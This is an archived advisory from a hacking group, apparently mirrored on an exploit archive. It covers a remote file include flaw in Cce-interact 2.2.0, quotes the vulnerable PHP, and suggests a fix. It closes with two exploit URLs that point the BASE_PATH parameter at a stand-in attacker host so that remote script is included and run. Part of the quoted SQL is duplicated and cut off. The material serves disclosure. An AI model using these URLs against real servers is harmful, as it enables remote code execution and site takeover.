AOH :: HP Unsorted I :: B06-4467.HTM

interact <= 2.2 (CONFIG) Remote File Include Vulnerability



interact <= 2.2 (CONFIG) Remote File Include Vulnerability
interact <= 2.2 (CONFIG) Remote File Include Vulnerability



/*=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
-   - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0=0D
- [Script site: https://sourceforge.net/projects/cce-interact/=0D
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
-          Find by: CarcaBot=0D
+=0D
- Contact: CarcaBotx@yahoo.com=0D 
-                        or=0D
- http://Hacking.CarcaBot.ro=0D 
+=0D
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
+=0D
- Special Greetz: CarcaBot=0D
- http://Hacking.CarcaBot.ro=0D 
-=0D
+=0D
*/=0D
/*=0D
vulnerable code => admin/autoprompter.php line 33-38:=0D
....=0D
=0D
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');=0D
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');=0D
=0D
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,=0D
{$CONFIG['DB_PREFIX']}posts.subject,=0D
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,=0D
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM=0D
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces=0D
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key=0D
WHERE=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.date_addedExecute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,=0D
{$CONFIG['DB_PREFIX']}posts.subject,=0D
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,=0D
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM=0D
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces=0D
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key=0D
WHERE=0D
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey=0D
AND=0D
{$CONFIG['DB_PREFIX']}posts.date_added includes/common.inc.php line 35-40:=0D
....=0D
=0D
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';=0D
//Include database abstraction classes=0D
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');=0D
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');=0D
=0D
....=0D
Exploit Fix:=0D
includes/common.inc.php line 35-40:=0D
....=0D
=0D
require_once('../local/config.inc.php');=0D
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';=0D
//Include database abstraction classes=0D
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');=0D
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');=0D
=0D
=0D
*/=0D
#Exploit:=0D
=0D
http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]=0D 
=0D
http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]=0D 
### End of File ###=0D
### http://Hacking.CarcaBot.ro ### 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.